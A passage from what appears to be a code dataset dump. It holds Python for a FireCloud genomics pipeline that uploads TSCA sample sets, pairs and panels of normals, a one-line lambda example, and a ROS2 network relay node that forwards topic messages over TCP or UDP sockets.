    pairsets.to_csv(filename, sep='\t', index=False)
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
def save_and_upload_cohort_all_samples(all_samples, name, namespace, workspace, blacklist=[]):
    """Create and upload the all-samples cohort sample set.

    Args:
        - all_samples: full sample table
        - name: sample-set id for the cohort
        - blacklist: sample ids to exclude
    Returns:
        - response from upload_entities_from_tsv
    """
    df = all_samples[['entity:sample_id']].rename(columns={'entity:sample_id': 'sample_id'})
    df['membership:sample_set_id'] = name
    # Re-arrange columns (set id first, as FC import expects)
    cols = ['membership:sample_set_id', 'sample_id']
    df = df[cols]
    # Blacklist
    df = df[~df['sample_id'].isin(blacklist)]
    # Fix: ensure the output directory exists — the original assumed
    # all_samples/ was already present and failed otherwise.
    os.makedirs('all_samples', exist_ok=True)
    filename = 'all_samples/fc_upload_%s.txt' % name
    df.to_csv(filename, index=None, sep="\t")
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
def save_and_upload_cohort_all_tumors(all_samples, name, namespace, workspace, blacklist=[]):
    """Create and upload the cohort of all tumor samples across all batches.

    Args:
        - all_samples: full sample table (sample_type column required)
        - name: cohort set id (usually Cum_Tumors_{LATEST_TSCA_ID}_all)
        - blacklist: sample ids to exclude
    Returns:
        - response from upload_entities_from_tsv
    """
    tumor_samples = all_samples[all_samples.sample_type == "Tumor"]
    # Prepare column names
    df = tumor_samples[['entity:sample_id']].rename(columns={'entity:sample_id': 'sample_id'})
    df['membership:sample_set_id'] = name
    # Re-arrange columns (set id first, as FC import expects)
    cols = ['membership:sample_set_id', 'sample_id']
    df = df[cols]
    # Blacklist
    df = df[~df['sample_id'].isin(blacklist)]
    # Fix: ensure the output directory exists — the original assumed
    # tumor_samples/ was already present and failed otherwise.
    os.makedirs('tumor_samples', exist_ok=True)
    filename = 'tumor_samples/fc_upload_%s.txt' % name
    df.to_csv(filename, index=None, sep="\t")
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
########################################################
# PoN Functions
########################################################
def create_panel_of_normals_advanced(tsca_id, all_samples, num_normals_per_cohort_involved = 3, batches_to_pick_from = []):
    """Create a panel of normals for batch with @tsca_id.

    Adds @num_normals_per_cohort_involved normal samples from each cohort
    involved in the batch. The pool of cohort normals can be restricted to
    the batches listed in @batches_to_pick_from (default empty list means no
    batch qualifies, so only the batch's own normals end up in the PoN; the
    shared mutable default is safe because the list is never mutated).
    Returns:
        (final_pon, final_pon_name): membership df ready for FC upload, and
        the generated sample-set name encoding the normal counts.
    """
    # Get all samples
    batch_samples = all_samples[all_samples['tsca_id']==tsca_id]
    # Batch normals
    batch_normals = batch_samples[batch_samples['sample_type']=="Normal"]
    # Number of normals in batch
    num_normals_from_batch = batch_normals.shape[0]
    # Cohorts of samples in batch
    cohorts_involved = batch_samples['cohort_code'].unique()
    # Only select normals from the restricted batches
    restricted_normals = all_samples[(all_samples['tsca_id'].isin(batches_to_pick_from)) & (all_samples['sample_type']=="Normal")]
    # Merge all normals from cohorts involved (first N per cohort, in table order)
    cohorts_normals_lst = []
    for cohort_involved in cohorts_involved:
        cohort_normals = restricted_normals[(restricted_normals['cohort_code']==cohort_involved)] \
                             .iloc[:num_normals_per_cohort_involved]
        cohorts_normals_lst.append(cohort_normals)
    cohorts_normals = pd.concat(cohorts_normals_lst)
    # Final PoN: batch normals + normals cohorts involved
    # NOTE(review): if a batch normal is also picked as a cohort normal
    # (possible when tsca_id is in batches_to_pick_from), it appears twice
    # in the concat — confirm whether dedup is expected here.
    final_pon = pd.concat([batch_normals, cohorts_normals])
    num_normals = final_pon.shape[0]
    # Name encodes batch-normal count, per-cohort count and total count.
    final_pon_name = "PoN_%s_%s_batch_normals_%s_normals_per_cohort_%s_total"\
                        %(tsca_id, num_normals_from_batch, num_normals_per_cohort_involved, num_normals)
    # Prepare for FC format
    final_pon['membership:sample_set_id'] = final_pon_name
    final_pon['sample_id'] = final_pon['entity:sample_id']
    final_pon = final_pon[['membership:sample_set_id', 'sample_id']]
    return final_pon, final_pon_name
def create_panel_of_normals_from_small_batch(tsca_id, all_samples, num_normals_from_batch=-1, num_normals_per_cohort_involved=3, num_normals=25):
    """Create panel of normals with samples from a given small batch.

    Small batches are 24-48 samples (instead of the traditional 96). The main
    difference is that there are only 2-4 normals per batch, so we must include
    normals from all the cohorts involved in this batch, and top up with random
    normals if we still fall short of @num_normals.

    Args:
        - tsca_id: tsca batch to build the PoN for
        - all_samples: DataFrame with 'tsca_id', 'sample_type', 'cohort_code'
          and 'entity:sample_id' columns
        - num_normals_from_batch: number of normal samples from batch (-1 for all)
        - num_normals_per_cohort_involved: normals taken from every cohort involved
        - num_normals: total number of normals desired in the PoN

    Returns:
        (final_pon, final_pon_name): FireCloud membership DataFrame with
        columns ['membership:sample_set_id', 'sample_id'], and the PoN name.
    """
    # Get all samples of the batch
    batch_samples = all_samples[all_samples['tsca_id'] == tsca_id]
    batch_normals = batch_samples[batch_samples['sample_type'] == "Normal"]
    if num_normals_from_batch == -1:
        # BUGFIX: the old code did iloc[:num_normals_from_batch] even for -1,
        # which silently dropped the LAST batch normal instead of taking all.
        batch_label = "all"
    else:
        batch_normals = batch_normals.iloc[:num_normals_from_batch]
        batch_label = num_normals_from_batch
    # Cohorts of samples in batch
    cohorts_involved = batch_samples['cohort_code'].unique()
    # Merge normals from all the cohorts involved
    cohorts_normals_lst = [
        all_samples[(all_samples['cohort_code'] == cohort) & (all_samples['sample_type'] == "Normal")]
        .iloc[:num_normals_per_cohort_involved]
        for cohort in cohorts_involved
    ]
    if cohorts_normals_lst:
        cohorts_normals = pd.concat(cohorts_normals_lst)
    else:
        cohorts_normals = all_samples.iloc[0:0]
    # Number of normals necessary to complete a total of @num_normals in PoN
    num_missing_normals = num_normals - cohorts_normals.shape[0] - batch_normals.shape[0]
    # If missing normals, select at random from the rest of the samples.
    # BUGFIX: `random_normals` used to be defined only inside the if-branch but
    # concatenated unconditionally, raising NameError when nothing was missing.
    extras = []
    if num_missing_normals > 0:
        extras.append(all_samples[all_samples['sample_type'] == "Normal"].sample(n=num_missing_normals))
    # Final PoN: batch normals + normals of cohorts involved + random top-up
    final_pon = pd.concat([batch_normals, cohorts_normals] + extras).copy()
    final_pon_name = "PoN_%s_%s_batch_normals_%s_normals_per_cohort_%s_total" \
        % (tsca_id, batch_label, num_normals_per_cohort_involved, num_normals)
    # Prepare for FC format
    final_pon['membership:sample_set_id'] = final_pon_name
    final_pon['sample_id'] = final_pon['entity:sample_id']
    final_pon = final_pon[['membership:sample_set_id', 'sample_id']]
    return final_pon, final_pon_name
def create_panel_of_normals(paths, N, name):
    """Create panel of normals sample set for Firecloud from multiple TSCA batches.

    Randomly selects N normal samples from the samples present in the files
    listed in @paths.

    Args:
        paths: (list) paths to files ending in {}.import_samples.txt
        N: (int) number of samples in the panel; -1 means "use ALL normals"
        name: (string) name of the Panel of Normals

    Returns:
        DataFrame with columns ['membership:sample_set_id', 'sample_id'].
    """
    df = pd.concat([pd.read_table(p) for p in paths], axis=0)
    # Shuffle samples so the selection draws from all batches
    df = df.sample(frac=1).reset_index(drop=True)
    normals = df[df.sample_type == "Normal"]['sample_id']
    if N == -1:
        # BUGFIX: the old code sliced [:N] even for N == -1, which silently
        # dropped the last normal; -1 now really selects every normal.
        print("Creating panel of %d normals" % normals.shape[0])
    else:
        normals = normals[:N]
        print("Creating panel of %d normals" % N)
    # Compile FireCloud membership data
    data = pd.concat([pd.DataFrame(index=normals.index, columns=['membership:sample_set_id'], data=name),
                      normals], axis=1)
    return data
def upload_pon(pon_df, pon_name, namespace, workspace):
    """Upload a Panel of Normals (PoN) sample set to FireCloud.

    Args:
        - pon_df: dataframe with the normal samples in the PoN
          (columns 'membership:sample_set_id' and 'sample_id')
        - pon_name: name of the PoN (used to derive the upload filename)
        - namespace / workspace: FireCloud destination

    Returns:
        HTTP response from the entity upload.
    """
    # os.makedirs replaces the old os.system('mkdir -p PoNs'): portable,
    # no shell spawned.
    os.makedirs('PoNs', exist_ok=True)
    filename = 'PoNs/fc_upload_PoN_%s.txt' % pon_name
    # sep is passed as a keyword: the old positional to_csv(filename, '\t')
    # relied on a deprecated positional form of DataFrame.to_csv.
    pon_df.to_csv(filename, sep='\t', index=False)
    # Reuse `filename` so the written and uploaded paths can never diverge.
    return upload_entities_from_tsv(namespace, workspace, filename)
################################################
# Helper Functions
###############################################
def upload_entities_from_tsv(namespace, workspace, entities_tsv_file):
    """Push the entities defined in a TSV file to FireCloud.

    Args:
        namespace / workspace: FireCloud destination.
        entities_tsv_file: path to the TSV file to upload.

    Returns:
        HTTP response from the FireCloud API.
    """
    return firecloud_api.upload_entities_tsv(namespace, workspace, entities_tsv=entities_tsv_file)
def delete_pair(namespace, workspace, pair_id):
    """Delete a single pair entity from the given FireCloud workspace.

    Returns the HTTP response from the delete call.
    """
    payload = [{"entityType": "pair", "entityName": pair_id}]
    return firecloud_api.delete_entities(namespace, workspace, payload)
def delete_pair_set(namespace, workspace, pair_set_id):
    """Delete a pair set entity from the given FireCloud workspace.

    Returns the HTTP response from the delete call.
    """
    payload = [{"entityType": "pair_set", "entityName": pair_set_id}]
    return firecloud_api.delete_entities(namespace, workspace, payload)
def delete_sample(namespace, workspace, sample_id):
    """Delete a single sample entity from the given FireCloud workspace.

    Returns the HTTP response from the delete call.
    """
    payload = [{"entityType": "sample", "entityName": sample_id}]
    return firecloud_api.delete_entities(namespace, workspace, payload)
def delete_sample_set(namespace, workspace, sample_set_id):
    """Delete a sample set entity from the given FireCloud workspace.

    Returns the HTTP response from the delete call.
    """
    payload = [{"entityType": "sample_set", "entityName": sample_set_id}]
    return firecloud_api.delete_entities(namespace, workspace, payload)
def delete_participant(namespace, workspace, participant_id):
    """Delete a participant entity from the given FireCloud workspace.

    Returns the HTTP response from the delete call.
    """
    payload = [{"entityType": "participant", "entityName": participant_id}]
    return firecloud_api.delete_entities(namespace, workspace, payload)
def download_remote_samples(namespace, workspace):
    """Download the remote sample entities from FireCloud.

    Writes:
        remote_files/remote_samples.txt - TSV of samples currently in FC.
    """
    response = firecloud_api.get_entities_tsv(namespace, workspace, "sample")
    with open('remote_files/remote_samples.txt', 'w') as outfile:
        outfile.write(response.text)
def merge_walkupseq_files(latest_tsca_id):
    """Merge all walkupseq files in the walkupseq_files directory.

    These files carry metadata (primary disease, media type) to add to sample
    metadata.

    Args:
        latest_tsca_id: id used to name the combined output file.

    Writes:
        walkupseq_files/walkupseq_all_combined_<latest_tsca_id>.txt

    Returns:
        The combined DataFrame.
    """
    paths = glob.glob('walkupseq_files/*sample_info*')
    # latin1: walkupseq exports are not utf-8 clean
    dfs = [pd.read_table(f, encoding='latin1') for f in paths]
    df = pd.concat(dfs, axis=0)
    df.to_csv('walkupseq_files/walkupseq_all_combined_%s.txt' % latest_tsca_id, sep="\t", index=None)
    return df
def remove_blacklisted_samples(all_samples):
    """Drop samples whose ids appear in samples_blacklist.txt.

    Args:
        all_samples: DataFrame with an 'entity:sample_id' column.

    Returns:
        The same DataFrame minus blacklisted rows.
    """
    blacklist_df = pd.read_table("samples_blacklist.txt", header=None, names=["entity:sample_id"])
    banned = set(blacklist_df["entity:sample_id"])
    keep_mask = ~all_samples["entity:sample_id"].isin(banned)
    return all_samples[keep_mask]
################################################
### MAIN
###############################################
################################# TODO: #####################################
# UPDATE REMOTE FILES WITH TSCA JUST RUN AFTER THE FIRST TIME BOTH PROGRAMS HAVE SUCCEEDED
# (upload_data_new_batch and update_cohorts)
#############################################################################
# Based on results from commands (r4*, r5, r6)
# For example, if running TSCA 23, tsca_id = "TSCA23" and latest_tsca_id = "TSCA22".
# Run upload_data_new_batch
def upload_data_new_batch(tsca_id, latest_tsca_id, paths_to_batches_info, namespace, workspace, google_bucket_id):
    """Upload all FireCloud entities for a new TSCA batch.

    This function only needs to be called once for a new batch.
    Only run once, otherwise you will create duplicate samples in the sample sets.

    Args:
        - tsca_id: id of TSCA for which data is to be uploaded
        - latest_tsca_id: id of latest TSCA available
        - paths_to_batches_info: file with paths to .import_samples.txt files (paths_to_batches_info.xlsx)
        - namespace / workspace / google_bucket_id: self-explanatory

    Returns:
        Tuple of HTTP responses, one per upload step.
    """
    paths_to_batches_info_df = pd.read_excel(paths_to_batches_info, index_col=0)
    path_to_samples_info = paths_to_batches_info_df.loc[tsca_id, 'path_to_samples_info']
    # DF of remote [sample <> sample set]
    remote_sample_sets = pd.read_table('remote_files/sample_set_membership_%s.tsv'%latest_tsca_id)
    # DF of remote [pair <> pair set]
    remote_pair_sets = pd.read_table('remote_files/pair_set_membership_%s.tsv'%latest_tsca_id)
    all_samples = get_samples(paths_to_batches_info, google_bucket_id)
    # Add cohorts for older batches
    all_samples = add_cohort_to_old_batches(all_samples)
    # Remove blacklisted samples. CONSISTENCY FIX: this used to duplicate the
    # body of remove_blacklisted_samples inline; use the shared helper instead.
    all_samples = remove_blacklisted_samples(all_samples)
    ########## Participants ##########
    print("Uploading participants...")
    participants = prepare_participants_for_metadata_export(path_to_samples_info, tsca_id)
    r1 = save_and_upload_participants(participants, namespace, workspace, tsca_id)
    ########## Samples ##########
    print("Uploading samples...")
    batch_samples = prepare_batch_samples_for_metadata_export(path_to_samples_info, tsca_id, google_bucket_id)
    r2 = save_and_upload_samples(batch_samples, namespace, workspace, tsca_id)
    ########## Pairs ##########
    print("Uploading pairs...")
    pairs = create_pairs_list(all_samples)
    r3 = save_and_upload_pairs(namespace, workspace, pairs)
    ########## Sample Sets ##########
    print("Uploading sample sets...")
    batch_sample_set, batch_tumor_set, batch_normal_set = prepare_batch_sample_set_for_metadata_export(path_to_samples_info, tsca_id)
    # Remove the samples that have already been uploaded
    uploaded_sample_ids = remote_sample_sets['sample'].tolist()
    batch_sample_set_clean = batch_sample_set[~batch_sample_set['sample_id'].isin(uploaded_sample_ids)]
    batch_tumor_set_clean = batch_tumor_set[~batch_tumor_set['sample_id'].isin(uploaded_sample_ids)]
    batch_normal_set_clean = batch_normal_set[~batch_normal_set['sample_id'].isin(uploaded_sample_ids)]
    r4a, r4b, r4c = save_and_upload_batch_sample_sets(batch_sample_set_clean, batch_tumor_set_clean, batch_normal_set_clean, tsca_id, namespace, workspace)
    ########## PoNs ##########
    print("Uploading PoNs...")
    # Numeric part of the latest tsca id (raw string avoids the
    # invalid-escape-sequence warning of '\d+')
    latest_tsca_id_int = int(re.findall(r'\d+', latest_tsca_id)[0])
    # All previous TSCA ids: TSCA14..latest, plus the combined TSCA1213 batch
    previous_tsca_ids = ["TSCA%s"%i for i in np.arange(14, latest_tsca_id_int+1)]
    previous_tsca_ids.insert(0, "TSCA1213")
    pon, name = create_panel_of_normals_advanced(tsca_id, all_samples,
                                                 num_normals_per_cohort_involved=3,
                                                 batches_to_pick_from=previous_tsca_ids)
    # Only upload PoN if it hasn't been uploaded already
    if name not in remote_sample_sets['membership:sample_set_id'].unique().tolist():
        r5 = upload_pon(pon, name, namespace, workspace)
    else:
        print("PoN already exists...")
        r5 = {}
    ########## Pair Sets ##########
    print("Uploading pair sets...")
    # Upload cumulative pair sets
    tn_cum_pairsets, tp_cum_pairsets = prepare_cumulative_pairsets_for_metadata_export(pairs, tsca_id)
    r6 = upload_pairsets(namespace, workspace, tn_cum_pairsets, "TN")
    r7 = upload_pairsets(namespace, workspace, tp_cum_pairsets, "TP")
    # Batch pair sets: skip pairs already present remotely
    tn_pairsets, tp_pairsets = prepare_batch_pairsets_for_metadata_export(all_samples, pairs, tsca_id)
    uploaded_pair_ids = remote_pair_sets['pair'].tolist()
    tn_pairsets_clean = tn_pairsets[~tn_pairsets['pair_id'].isin(uploaded_pair_ids)]
    tp_pairsets_clean = tp_pairsets[~tp_pairsets['pair_id'].isin(uploaded_pair_ids)]
    r8 = upload_pairsets(namespace, workspace, tn_pairsets_clean, "TN")
    r9 = upload_pairsets(namespace, workspace, tp_pairsets_clean, "TP")
    return (r1, r2, r3, r4a, r4b, r4c, r5, r6, r7, r8, r9)
def update_cohorts(tsca_id, latest_tsca_id, paths_to_batches_info, namespace, workspace, google_bucket_id):
    """
    Update cohorts (sample sets that span multiple batches).
    This function needs to be called once for a new batch. Before updating a cohort sample set, it removes samples that
    already belong to that cohort remotely, because if we don't they will be duplicated.
    Args:
        - tsca_id: id of the TSCA batch being processed (used to name the cumulative sets)
        - latest_tsca_id: id of latest TSCA available
        - paths_to_batches_info: file with paths to .import_samples.txt files (paths_to_batches_info.xlsx)
        - Rest are self-explanatory
    Returns:
        Tuple of HTTP responses (r1..r5), one per upload step.
    """
    # Pre-requisites: assemble the full sample table across all batches
    all_samples = get_samples(paths_to_batches_info, google_bucket_id)
    # Add cohorts for older batches
    all_samples = add_cohort_to_old_batches(all_samples)
    # Remove blacklisted samples
    all_samples = remove_blacklisted_samples(all_samples)
    pairs = create_pairs_list(all_samples)
    # DF of remote samples
    # NOTE(review): currently unused — only the commented-out dedup block below reads it
    remote_samples = pd.read_table('remote_files/remote_samples_%s.txt'%latest_tsca_id)
    # DF of remote [sample < > sample set ]
    remote_sample_sets = pd.read_table('remote_files/sample_set_membership_%s.tsv'%latest_tsca_id)
    # DF of remote [pair < > pair set]
    remote_pair_sets = pd.read_table('remote_files/pair_set_membership_%s.tsv'%latest_tsca_id)
    #### UPDATE COHORT SAMPLE SETS
    # DF of [samples < > sample set] to be updated
    cohorts = prepare_cohorts_for_metadata_export(all_samples)
    # Remove the samples that already belong to the cohort in FC (avoids duplicates)
    sample_ids_in_cohort = remote_sample_sets['sample'].tolist()
    cohorts_clean = cohorts[~cohorts['sample_id'].isin(sample_ids_in_cohort)]
    r1 = save_and_upload_cohorts(cohorts_clean, latest_tsca_id, namespace, workspace)
    #### UPDATE COHORT PAIR SETS
    # Retrieve cohort pairsets
    cohort_pairsets = prepare_cohort_pairsets_for_metadata_exports(latest_tsca_id, pairs, all_samples, blacklist=[])
    # Remove the pairs that already belong to the cohort in FC
    pair_ids_in_cohort = remote_pair_sets['pair'].tolist()
    cohort_pairsets_clean = cohort_pairsets[~cohort_pairsets['pair_id'].isin(pair_ids_in_cohort)]
    r2 = save_and_upload_cohort_pairsets(namespace, workspace, cohort_pairsets_clean)
    # Remove samples that already exist in FC
    # remote_sample_ids = remote_samples['entity:sample_id'].tolist()
    # all_samples_clean = all_samples[~all_samples['entity:sample_id'].isin(remote_sample_ids)]
    r3 = save_and_upload_cohort_all_samples(all_samples, "Cum_%s_all"%tsca_id, namespace, workspace, blacklist=[])
    r4 = save_and_upload_cohort_all_tumors(all_samples, "Cum_Tumors_%s_all"%tsca_id, namespace, workspace, blacklist=[])
    ### Create cumulative PoN (all batches); -1 asks create_panel_of_normals for every normal
    pon_name = 'Cum_PoN_%s_all'%tsca_id
    paths_to_batches_info_df = pd.read_excel(paths_to_batches_info, index_col=0)
    cumulative_pon = create_panel_of_normals(paths_to_batches_info_df.path_to_samples_info.tolist(), -1, pon_name)
    r5 = upload_pon(cumulative_pon, pon_name, namespace, workspace)
    return (r1, r2, r3, r4, r5)
|
991,489 | 694ef27a90b8fc515517608104e6c1e23e416bb6 | x = lambda a, b: a + 1 + b
print(x(2, 3)) |
991,490 | 921e2072d270a66b5d0da39a40ed00ba3be53856 | import rclpy
from rclpy.node import Node
from contextlib import contextmanager
from functools import partial, total_ordering
from importlib import import_module
import queue
import socket
from typing import Any
import threading
import traceback
import time
from ros2relay.message_socket.message_socket import MessageSocket, SocketMessage, MessageType
from ros2relay.metrics.metrics import MessageMetricsHandler
# class obtained from combination of https://stackoverflow.com/a/16782490/4089216 and https://stackoverflow.com/a/16782391/4089216
# class obtained from combination of https://stackoverflow.com/a/16782490/4089216 and https://stackoverflow.com/a/16782391/4089216
class TimeoutLock(object):
    """A Lock whose context manager gives up after ``timeout`` seconds.

    Usage:
        with lock.acquire_timeout(0.1) as acquired:
            if acquired:
                ...

    Note the with-body runs whether or not the lock was acquired; callers
    must check the yielded flag.
    """

    def __init__(self):
        self._lock = threading.Lock()

    @contextmanager
    def acquire_timeout(self, timeout):
        result = self._lock.acquire(timeout=timeout)
        try:
            yield result
        finally:
            # BUGFIX: the release used to run after a bare yield, so an
            # exception raised inside the with-block skipped it and leaked
            # the lock forever. finally guarantees the release.
            if result:
                self._lock.release()
# class obtained from https://stackoverflow.com/a/54028394/4089216
# class obtained from https://stackoverflow.com/a/54028394/4089216
@total_ordering
class PrioritizedItem:
    """Wrapper that orders queue entries by ``priority`` alone.

    ``item`` is the payload and never participates in comparisons;
    total_ordering derives the remaining operators from __eq__ and __lt__.
    """

    def __init__(self, priority, item):
        self.priority = priority
        self.item = item

    def __eq__(self, other):
        if isinstance(other, PrioritizedItem):
            return self.priority == other.priority
        return NotImplemented

    def __lt__(self, other):
        if isinstance(other, PrioritizedItem):
            return self.priority < other.priority
        return NotImplemented
class NetworkPublisher(Node):
    """ ros2relay NetworkPublisher subscribes to a set of topics on the local system and publishes them to the network

        Requires that a NetworkSubscriber be running on the target endpoint.

        NOTE(review): the containers below are CLASS attributes, shared by all
        instances; this is only safe if a single node instance exists per
        process — confirm before instantiating more than one.
    """
    # priority of the topic, where a lower value indicates a higher priority
    topic_priorities = {}
    # per-topic sample rate (a message is sent once every rate+1 observed — see work())
    topic_sample_rates = {}
    # how many packets we've observed on a topic. The format is
    # [{topic:numSampled}]
    # where each index is a worker id
    worker_sample_counts = []
    # whether sampling is enabled (turned off in _set_local_params when no sampleRates param is given)
    sampling = True
    # keep reference to subscriptions
    my_subscriptions = {}
    # each worker thread will have a socket, each worker_id is between 0 and worker_count - 1
    # each workers socket belongs at sockets[worker_id]
    sockets = []
    # locks only used for reconnect on tcp
    socket_locks = []
    # maintain workers to join later
    workers = []
    # bounded priority queue shared by all workers;
    # need to do some testing with 1000 as max value
    message_queue = queue.PriorityQueue(1000)

    def __init__(self):
        """Read parameters, create one subscription per topic, open one socket
        per worker, then start the worker threads and the metrics timer."""
        super().__init__('ros2relay_net_publisher')
        self._declare_parameters()
        self._set_local_params()
        for idx, tType in enumerate(self.topic_types):
            # topic types arrive as dotted strings (e.g. 'std_msgs.msg.String');
            # import the module and resolve the message class dynamically
            module_parts = tType.split('.')
            module_name = module_parts[0] + '.' + module_parts[1]
            module = import_module(module_name)
            msg = getattr(module, module_parts[2])
            self.topic_priorities[self.topics[idx]] = self.topic_priority_list[idx]
            # bind the topic name into the callback so every topic shares one handler
            func = partial(self.listener_callback, self.topics[idx])
            if self.sampling:
                self.topic_sample_rates[self.topics[idx]] = self.sample_rates[idx]
            self.my_subscriptions[self.topics[idx]] = self.create_subscription(
                msg,
                self.topics[idx],
                func,
                10
            )
            samplingMessage = str(self.sample_rates[idx]) if self.sampling else 'Disabled'
            self.get_logger().info(f'Initializing topic "{self.topics[idx]}" : {tType} - sample rate : {samplingMessage}')
        self.running = True
        for i in range(0, self.worker_count):
            if self.sampling:
                # counters start AT the sample rate so the first message observed
                # on each topic is sent immediately (see the comparison in work())
                self.worker_sample_counts.append({})
                for topic in self.topics:
                    self.worker_sample_counts[i][topic] = self.topic_sample_rates[topic]
            self.socket_locks.append(TimeoutLock())
            self.init_socket_with_rety(i)
        # as worker threads can access the socket list, initialize workers in separate loop after initial sockets
        # to keep concurrence. Each worker thread only accesses its own position in the array once initialized
        for i in range(0, self.worker_count):
            self.workers.append(threading.Thread(target=self.work, args=((i,))))
            self.workers[i].start()
        self.get_logger().info(f"{self.worker_count} workers started. Sending to {self.host}:{self.port} mode = {self.mode}")
        self.metric_handler = MessageMetricsHandler(num_handlers=self.worker_count, count_drops=True)
        timer_period = 1  # seconds
        self.metric_publisher = self.create_timer(timer_period, self.metric_handler.publish_metrics)

    def _set_local_params(self):
        """Copy the declared ROS parameters onto the instance and validate them.

        Raises:
            ValueError: when a required parameter is missing, or the
                topics/topicTypes/sampleRates array lengths disagree.
        """
        self.topics = self.get_parameter('topics').get_parameter_value().string_array_value
        self.topic_types = self.get_parameter('topicTypes').get_parameter_value().string_array_value
        self.mode = self.get_parameter('mode').get_parameter_value().string_value
        self.host = self.get_parameter('server').get_parameter_value().string_value
        self.port = self.get_parameter('port').get_parameter_value().integer_value
        self.topic_priority_list = self.get_parameter('topicPriorities').get_parameter_value().integer_array_value
        sampleRateParam = self.get_parameter('sampleRates').get_parameter_value()
        self.sample_rates = None
        required_params = [
            ('topics', self.topics),
            ('topicTypes', self.topic_types),
            ('mode', self.mode),
            ('host', self.host),
            ('port', self.port)]
        for (paramName, param) in required_params:
            # an empty string/array, or 0 for the port, means "not provided"
            if ((isinstance(param, list) or isinstance(param, str)) and len(param) == 0) or param == 0:
                raise ValueError(f"{paramName} is a required parameter and was not set")
        if not self.topic_priority_list:
            # default: every topic gets the same (highest) priority 0
            self.topic_priority_list = [0 for topic in self.topics]
        if len(self.topics) != len(self.topic_types):
            raise ValueError("topic and topicTypes parameters should be equal in size." +
                f"topic size: {len(self.topics)}, topicTypes size: {len(self.topic_types)}")
        if len(sampleRateParam.integer_array_value) != 0:
            if len(sampleRateParam.integer_array_value) != len(self.topics):
                raise ValueError('if sampleRates parameter is set as array, length of array must be equal to number of topics')
            self.sample_rates = sampleRateParam.integer_array_value
        if self.sample_rates is None and sampleRateParam.integer_value != 0:
            # same sample rate for each topic
            self.sample_rates = [sampleRateParam.integer_value for topic in self.topics]
        if self.sample_rates is None:
            self.get_logger().info('sample rates was not set, sending all topics data')
            self.sampling = False
        # if tcp, this value should be less than or equal to the number of clients the net_subscriber can handle
        self.worker_count = self.get_parameter('numWorkers').get_parameter_value().integer_value

    def _declare_parameters(self):
        """Declare every ROS parameter this node reads (only 'mode' has a default)."""
        self.declare_parameter('server')
        self.declare_parameter('port')
        self.declare_parameter('topics')
        self.declare_parameter('topicTypes')
        self.declare_parameter('topicPriorities')
        self.declare_parameter('mode', 'tcp')
        self.declare_parameter('numWorkers')
        self.declare_parameter('sampleRates')

    def init_socket_with_rety(self, worker_id):
        """ attempts to initialize the socket with retries for the worker_id. retries is only attempted for tcp connections """
        if self.mode == "tcp":
            # acquire lock for this socket in 100 ms or abandon, another thread is handling the socket reconnect
            # NOTE(review): the acquired-flag yielded by acquire_timeout is never
            # checked, so this reconnect loop runs even when the lock was NOT
            # obtained — confirm whether that is intended.
            with self.socket_locks[worker_id].acquire_timeout(0.1):
                connected = False
                while not connected:
                    try:
                        self._init_socket_tcp(worker_id)
                        connected = True
                        self.get_logger().info('Connection successful!')
                    except Exception as e:
                        self.get_logger().error(f"Error initializing socket exception: {str(e)} worker id {worker_id}")
                        # visible countdown between attempts (~4s total)
                        for i in range(1, 5):
                            self.get_logger().info(f'Retrying in {5-i}')
                            time.sleep(1)
        elif self.mode == "udp":
            # UDP is connectionless, so no retry loop is needed
            self._init_socket_udp(worker_id)
        else:
            raise Exception("Mode must be one of 'udp' or 'tcp'")

    def _init_socket_tcp(self, worker_id):
        """
        initializes a tcp socket. If the socket was already initialized then it attempts to close the socket before assigning it to our
        active sockets
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((self.host, self.port))
        if len(self.sockets) - 1 < worker_id:
            # first-time initialization for this worker
            self.sockets.append(MessageSocket(sock))
        else:
            # socket was already initialized, MessageSocket implements a try:catch
            self.sockets[worker_id].close()
            self.sockets[worker_id] = MessageSocket(sock)

    def _init_socket_udp(self, worker_id):
        """Create (or replace) the UDP socket for worker_id, targeting (host, port)."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        if len(self.sockets) - 1 < worker_id:
            self.sockets.append(MessageSocket(sock, (self.host, self.port)))
        else:
            # socket was already initialized, MessageSocket implements a try:catch
            self.sockets[worker_id].close()
            self.sockets[worker_id] = MessageSocket(sock, (self.host, self.port))

    def work(self, worker_id):
        """
        work thread, retrieve items from the priority queue and send the message
        """
        try:
            while self.running:
                # blocking request - timeout 3 seconds
                messageSent = False
                try:
                    # throws queue.Empty exception if it fails to get an item in 3 seconds
                    priorityItem = self.message_queue.get(True, 3)
                    topic = priorityItem.item.topic
                    self.metric_handler.increment_observed()
                    print(f"sending message on topic {topic} approximate queue size: {self.message_queue.qsize()}")
                    if self.sampling == True:
                        # send 1 of every rate+1 messages: send when the counter
                        # reaches the topic's rate, otherwise just count
                        if self.worker_sample_counts[worker_id][topic] == self.topic_sample_rates[topic]:
                            self.send_message(priorityItem.item, worker_id)
                            self.worker_sample_counts[worker_id][topic] = 0
                        else:
                            self.worker_sample_counts[worker_id][topic] += 1
                    else:
                        self.send_message(priorityItem.item, worker_id)
                    # might not have actually been sent if we are sampling, but dont attempt to send it in finally
                    messageSent = True
                except (ConnectionResetError, BrokenPipeError, ConnectionResetError) as e:
                    # NOTE(review): ConnectionResetError is listed twice in this
                    # tuple — harmless, but presumably one entry was meant to be
                    # a different exception type; confirm.
                    # should maybe record number of times connection breaks? Will get wordy
                    self.get_logger().error(f"Error sending socket message: {str(e)}")
                    self.init_socket_with_rety(worker_id)
                except queue.Empty:
                    priorityItem = None
                    pass
                finally:
                    # give one more attempt at sending the message if we failed
                    if not messageSent and priorityItem is not None:
                        try:
                            self.send_message(priorityItem.item, worker_id)
                        except:
                            # best-effort retry; the message is dropped on failure
                            pass
        except Exception as ex:
            self.get_logger().error(f"Worker thread {worker_id} exitting unexpectedly with error: {str(ex)}")
            self.get_logger().error(traceback.format_exc())
        finally:
            self.get_logger().info(f"Worker thread {worker_id} finishing.")

    def listener_callback(self, topic, msg):
        """
        attempts to send the message to the remote server

        if this fails - it will try to re-initialize the socket. The message will attempt
        a single retry on the message, otherwise it will be lost and all subsequent
        messsages until the connection is re-established
        """
        netMessage = SocketMessage(mType=MessageType.MESSAGE, mTopic=topic, mPayload=msg)
        item = PrioritizedItem(priority=self.topic_priorities[topic], item=netMessage)
        try:
            # non-blocking: the subscription callback must never stall the executor
            self.message_queue.put_nowait(item)
